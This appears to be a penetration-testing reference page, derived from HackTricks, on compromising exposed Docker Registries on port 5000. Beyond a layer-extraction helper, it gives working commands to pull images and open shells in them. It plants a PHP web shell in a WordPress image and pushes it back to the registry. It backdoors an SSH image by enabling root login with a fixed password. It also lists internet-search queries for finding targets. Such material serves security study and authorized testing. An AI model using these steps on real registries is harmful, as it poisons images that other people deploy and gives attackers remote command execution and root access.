---
title: "5000 - Docker Registry"
weight: 5000
date: "2026-03-10T10:03:28+08:00"
lastmod: "2026-03-10T13:26:55+08:00"
---

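💡 **Study tip**: This document covers penetration testing methods for **5000 - Docker Registry** and is intended as a reference for information security beginners and practitioners.

⚠️ **Legal notice**: This document is for learning and authorized testing only. Testing systems without authorization may violate laws and regulations.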

---

> Note that when you download and decompress the blobs, files and folders will appear in the current directory. **If you download all the blobs and decompress them in the same folder, they will overwrite values from the previously decompressed blobs**, so be careful. It may be interesting to decompress each blob inside a different folder to inspect the exact content of each blob.
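
One way to follow this advice, as an added example that is not part of the original page: each layer blob is unpacked into its own folder and every path present in more than one layer is reported, which is also how a replaced file such as `sshd_config` stands out when reviewing an image. The `(name, bytes)` input shape, the function names and the sample layers are assumptions constructed for illustration.

```python
import io
import tarfile
import tempfile
from pathlib import Path


def extract_layers(blobs, out_dir):
    """Unpack each layer blob into its own folder under out_dir.
    blobs: list of (layer_name, tar_bytes) in manifest order (assumed input shape).
    Returns {path: [layers]} for every file present in more than one layer.
    """
    out_dir = Path(out_dir).resolve()
    seen = {}
    for name, data in blobs:
        layer_dir = out_dir / name
        layer_dir.mkdir(parents=True, exist_ok=True)
        with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
            for member in tar:
                target = (layer_dir / member.name).resolve()
                # Skip entries that would be written outside this layer's folder.
                if not target.is_relative_to(layer_dir):
                    continue
                if member.isdir():
                    target.mkdir(parents=True, exist_ok=True)
                elif member.isfile():
                    target.parent.mkdir(parents=True, exist_ok=True)
                    target.write_bytes(tar.extractfile(member).read())
                    rel = target.relative_to(layer_dir).as_posix()
                    seen.setdefault(rel, []).append(name)
                # Links and device nodes are not recreated; only file content is kept.
    return {path: layers for path, layers in seen.items() if len(layers) > 1}


def make_layer(files):
    """Build a gzip-compressed tar layer in memory (constructed sample data)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, content in files.items():
            info = tarfile.TarInfo(path)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


if __name__ == "__main__":
    blobs = [("layer0", make_layer({"etc/ssh/sshd_config": b"PermitRootLogin no\n"})),
             ("layer1", make_layer({"etc/ssh/sshd_config": b"PermitRootLogin yes\n"}))]
    with tempfile.TemporaryDirectory() as tmp:
        print(extract_layers(blobs, tmp))
```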

#### Information gathering using docker

```bash
#Once you know which images the server is saving (/v2/_catalog) you can pull them
docker pull 10.10.10.10:5000/ubuntu

#Check the commands used to create the layers of the image
docker history 10.10.10.10:5000/ubuntu
#IMAGE               CREATED             CREATED BY                                      SIZE                COMMENT
#ed05bef01522        2 years ago         ./run.sh                                        46.8MB
#<missing>           2 years ago         /bin/sh -c #(nop)  CMD ["./run.sh"]             0B
#<missing>           2 years ago         /bin/sh -c #(nop)  EXPOSE 80                    0B
#<missing>           2 years ago         /bin/sh -c cp $base/mysql-setup.sh /            499B
#<missing>           2 years ago         /bin/sh -c #(nop) COPY dir:0b657699b1833fd59…   16.2MB

#Run and get a shell
docker run -it 10.10.10.10:5000/ubuntu bash #Leave this shell running
docker ps #Using a different shell
docker exec -it 7d3a81fe42d7 bash #Get a shell inside the docker container
```

#### Backdooring WordPress image

In the scenario where you have found a Docker Registry saving a WordPress image you can backdoor it.\
**Create** the **backdoor**:

```php:shell.php
<?php echo shell_exec($_GET["cmd"]); ?>
```

Create a **Dockerfile**:

```dockerfile:Dockerfile
FROM 10.10.10.10:5000/wordpress
COPY shell.php /app/
RUN chmod 777 /app/shell.php
```

**Create** the new image, **check** it's created, and **push** it:

```bash
docker build -t 10.10.10.10:5000/wordpress . #Create
docker images
docker push registry:5000/wordpress #Push it
```

#### Backdooring SSH server image

Suppose that you found a Docker Registry with an SSH image and you want to backdoor it.\
**Download** the image and **run** it:

```bash
docker pull 10.10.10.10:5000/sshd-docker-cli
docker run -d 10.10.10.10:5000/sshd-docker-cli
```

Extract the `sshd_config` file from the SSH image:

```bash
docker cp 4c989242c714:/etc/ssh/sshd_config .
```

And modify it to set: `PermitRootLogin yes`

Create a **Dockerfile** like the following one:

```dockerfile
FROM 10.10.10.10:5000/sshd-docker-cli
COPY sshd_config /etc/ssh/
RUN echo root:password | chpasswd
```

**Create** the new image, **check** it's created, and **push** it:

```bash
docker build -t 10.10.10.10:5000/sshd-docker-cli . #Create
docker images
docker push registry:5000/sshd-docker-cli #Push it
```

---


### Search engine syntax

#### FOFA

```bash
# FOFA search syntax
port="5000"
```

#### Shodan

```bash
# Shodan search syntax
port:5000
```

#### ZoomEye

```bash
# ZoomEye search syntax
port:5000
```

---

## 📖 References

- [HackTricks - 5000-docker-registry](https://book.hacktricks.wiki/en/network-services-pentesting/5000-docker-registry.html)

